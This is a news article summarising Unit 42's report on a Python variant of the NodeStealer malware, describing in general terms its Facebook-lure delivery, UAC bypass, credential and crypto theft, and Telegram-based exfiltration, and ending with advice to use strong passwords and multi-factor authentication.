Cybersecurity researchers have exposed a novel Python variant of the notorious stealer malware, NodeStealer, which can seize complete control of Facebook business accounts and drain cryptocurrency reserves.

Palo Alto Network’s Unit 42 findings identified this previously undocumented strain amid an ongoing campaign that was set in motion in December 2022. As of now, there is no evidence to indicate an active cyber offensive.

Initially exposed by Meta back in May 2023, NodeStealer was described as a potent stealer adept at harvesting cookies and passwords from web browsers, targeting Facebook, Gmail, and Outlook accounts. While earlier samples were coded in JavaScript, the latest iterations of the malware are written in Python.

Unit 42 issued a warning about the risks posed by NodeStealer, highlighting its financial implications for Facebook business accounts and its knack for stealing browser credentials, which can subsequently be leveraged for further cyberattacks.

The nefarious attacks commence with deceptive messages on Facebook, enticing victims with the promise of free “professional” budget tracking templates in Microsoft Excel and Google Sheets. Unsuspecting users fall prey to the scheme and end up downloading a seemingly innocent ZIP archive file hosted on Google Drive.

The deceptive ZIP file conceals within it the malicious stealer executable, which not only seizes crucial information from Facebook business accounts but also facilitates the download of additional malware, such as BitRAT and XWorm, in the form of ZIP files.

To escalate the menace, the malware disables Microsoft Defender Antivirus and embarks on crypto theft by exploiting MetaMask credentials extracted from Google Chrome, Cốc Cốc, and Brave web browsers.

The perpetrators employ a User Account Control (UAC) bypass technique utilizing the fodhelper.exe, effectively executing PowerShell scripts to fetch ZIP files from a remote server, thus enabling the surreptitious downloads.

It is worth noting that the FodHelper UAC bypass method has been previously exploited by financially motivated threat actors associated with the Casbaneiro banking malware, seeking elevated privileges on compromised hosts.

Unit 42 also made discovered an upgraded Python variant of NodeStealer, featuring sophisticated anti-analysis capabilities, email parsing from Microsoft Outlook, and even attempts to commandeer the victim’s linked Facebook account.

Once all the necessary data is harvested, the files are stealthily exfiltrated via the Telegram API, following which they are systematically erased from the targeted machine to cover the tracks of the malicious operation.

Furthermore, NodeStealer joins the ranks of infamous malware like Ducktail, emanating from a concerning trend involving Vietnamese threat actors, who are increasingly drawn towards infiltrating Facebook business accounts for advertising fraud and spreading malware among other unsuspecting users.

This development comes at a time when threat actors have been observed exploiting WebDAV servers to execute BATLOADER, ad distribute XWorm for phishing attacks.

Researchers strongly advise Facebook business account owners to fortify their security measures, including the adoption of robust passwords and enabling multi-factor authentication.